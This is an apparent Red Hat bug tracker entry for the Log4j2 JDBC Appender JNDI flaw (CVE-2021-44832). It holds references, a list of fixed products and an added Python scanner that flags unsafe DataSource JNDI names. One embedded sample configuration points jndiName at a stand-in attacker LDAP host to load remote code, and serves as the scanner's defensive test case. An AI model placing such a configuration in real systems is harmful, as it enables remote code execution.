Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are vulnerable to remote code execution (RCE): an attacker who already has permission to modify the logging configuration file can construct a malicious configuration that uses a JDBC Appender with a DataSource connection source whose JNDI name references a remote JNDI URI, which can execute remote code. This issue is fixed in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2 by limiting JNDI DataSource names to the java: protocol.
References:
https://issues.apache.org/jira/browse/LOG4J2-3293
https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
Upstream patch: https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16
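An added example, not from this bug, the Red Hat errata, or the Log4j project: a small Python scanner that flags the configuration shape the description refers to, a JDBC appender whose DataSource jndiName is not confined to the java: scheme, which is the restriction the upstream fix enforces. The two embedded log4j2.xml documents are constructed samples; the hostname, table and data source names in them are invented.

```python
"""Flag Log4j2 XML configurations with a JDBC Appender DataSource whose JNDI
name is not restricted to the java: scheme (the CVE-2021-44832 shape).

Added example with constructed sample configurations; not code from the
Log4j project or from this bug.
"""
import xml.etree.ElementTree as ET

# Constructed sample (hostname and names invented): the vulnerable shape.
# The DataSource JNDI name points at a remote LDAP server, so a Log4j2 build
# before the fix performs a JNDI lookup against attacker-controlled data.
VULNERABLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <JDBC name="db" tableName="app_log">
      <DataSource jndiName="ldap://attacker.example:1389/Exploit"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="db"/>
    </Root>
  </Loggers>
</Configuration>
"""

# Constructed sample: the same appender bound to a container-scoped java:
# name, the only scheme the fixed releases still resolve for a DataSource.
SAFE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <JDBC name="db" tableName="app_log">
      <DataSource jndiName="java:comp/env/jdbc/AppLogDS"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="db"/>
    </Root>
  </Loggers>
</Configuration>
"""

JAVA_SCHEME = "java:"


def _attr(elem, name):
    """Case-insensitive attribute lookup; Log4j2 matches plugin element and
    attribute names without regard to case, so the scanner must too."""
    wanted = name.lower()
    for key, value in elem.attrib.items():
        if key.lower() == wanted:
            return value
    return None


def find_unsafe_jndi_datasources(config_xml):
    """Return a list of (appender name, jndiName) for every DataSource under a
    JDBC appender whose JNDI name does not start with 'java:'.

    A missing or scheme-less name is reported as well so it gets reviewed;
    the scanner is deliberately stricter than a plain 'is it ldap://' check,
    since rmi://, dns:// and other providers are equally reachable via JNDI.
    """
    root = ET.fromstring(config_xml)
    findings = []
    for appender in root.iter():
        if appender.tag.lower() != "jdbc":
            continue
        for child in appender.iter():
            if child is appender or child.tag.lower() != "datasource":
                continue
            jndi_name = _attr(child, "jndiName") or ""
            if not jndi_name.lower().startswith(JAVA_SCHEME):
                findings.append((_attr(appender, "name"), jndi_name))
    return findings


def scan_file(path):
    """Convenience wrapper for scanning a log4j2.xml on disk."""
    with open(path, "r", encoding="utf-8") as fh:
        return find_unsafe_jndi_datasources(fh.read())


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG), ("safe", SAFE_CONFIG)):
        print(label, find_unsafe_jndi_datasources(cfg))
```

The scanner only understands the XML configuration format; JSON, YAML and properties configurations need the same check applied to their `DataSource`/`jndiName` keys. A finding means the configuration would trigger an arbitrary JNDI lookup on an unfixed Log4j2, but the precondition in the description still holds: the real exposure is whoever can write the configuration file, so the fix is to upgrade to 2.17.1, 2.12.4 or 2.3.2 and to keep the configuration file writable only by deployment tooling.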
Created log4j tracking bugs for this issue: Affects: fedora-all [bug 2036026]
This issue has been addressed in the following products: Red Hat AMQ Streams 2.0.0 Via RHSA-2022:0138 https://access.redhat.com/errata/RHSA-2022:0138
This issue has been addressed in the following products: Red Hat Fuse 7.8.2 7.9.1 7.10.1 Via RHSA-2022:0203 https://access.redhat.com/errata/RHSA-2022:0203
This issue has been addressed in the following products: Red Hat Data Grid 8.2.3 Via RHSA-2022:0205 https://access.redhat.com/errata/RHSA-2022:0205
This issue has been addressed in the following products: Vert.x 4.1.8 Via RHSA-2022:0083 https://access.redhat.com/errata/RHSA-2022:0083
This issue has been addressed in the following products: EAP 7.4 log4j async Via RHSA-2022:0216 https://access.redhat.com/errata/RHSA-2022:0216
This issue has been addressed in the following products: Red Hat Integration Camel Extensions for Quarkus 2.2 Via RHSA-2022:0222 https://access.redhat.com/errata/RHSA-2022:0222
This issue has been addressed in the following products: Red Hat Integration Camel-K 1.6.3 Via RHSA-2022:0223 https://access.redhat.com/errata/RHSA-2022:0223
This issue has been addressed in the following products: OpenShift Logging 5.0 Via RHSA-2022:0225 https://access.redhat.com/errata/RHSA-2022:0225
This issue has been addressed in the following products: OpenShift Logging 5.1 Via RHSA-2022:0226 https://access.redhat.com/errata/RHSA-2022:0226
This issue has been addressed in the following products: OpenShift Logging 5.3 Via RHSA-2022:0227 https://access.redhat.com/errata/RHSA-2022:0227
This issue has been addressed in the following products: OpenShift Logging 5.2 Via RHSA-2022:0230 https://access.redhat.com/errata/RHSA-2022:0230
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2021-44832
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 3.11 Via RHSA-2022:0236 https://access.redhat.com/errata/RHSA-2022:0236
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.6 Via RHSA-2022:0181 https://access.redhat.com/errata/RHSA-2022:0181
This issue has been addressed in the following products: Red Hat AMQ Streams 1.6.7 Via RHSA-2022:0467 https://access.redhat.com/errata/RHSA-2022:0467
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.7 Via RHSA-2022:0493 https://access.redhat.com/errata/RHSA-2022:0493
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.8 Via RHSA-2022:0485 https://access.redhat.com/errata/RHSA-2022:0485
This issue has been addressed in the following products: Red Hat JBoss Enterprise Application Platform 7.4 on RHEL 7 Via RHSA-2022:1296 https://access.redhat.com/errata/RHSA-2022:1296
This issue has been addressed in the following products: Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8 Via RHSA-2022:1297 https://access.redhat.com/errata/RHSA-2022:1297
This issue has been addressed in the following products: EAP 7.4.4 release Via RHSA-2022:1299 https://access.redhat.com/errata/RHSA-2022:1299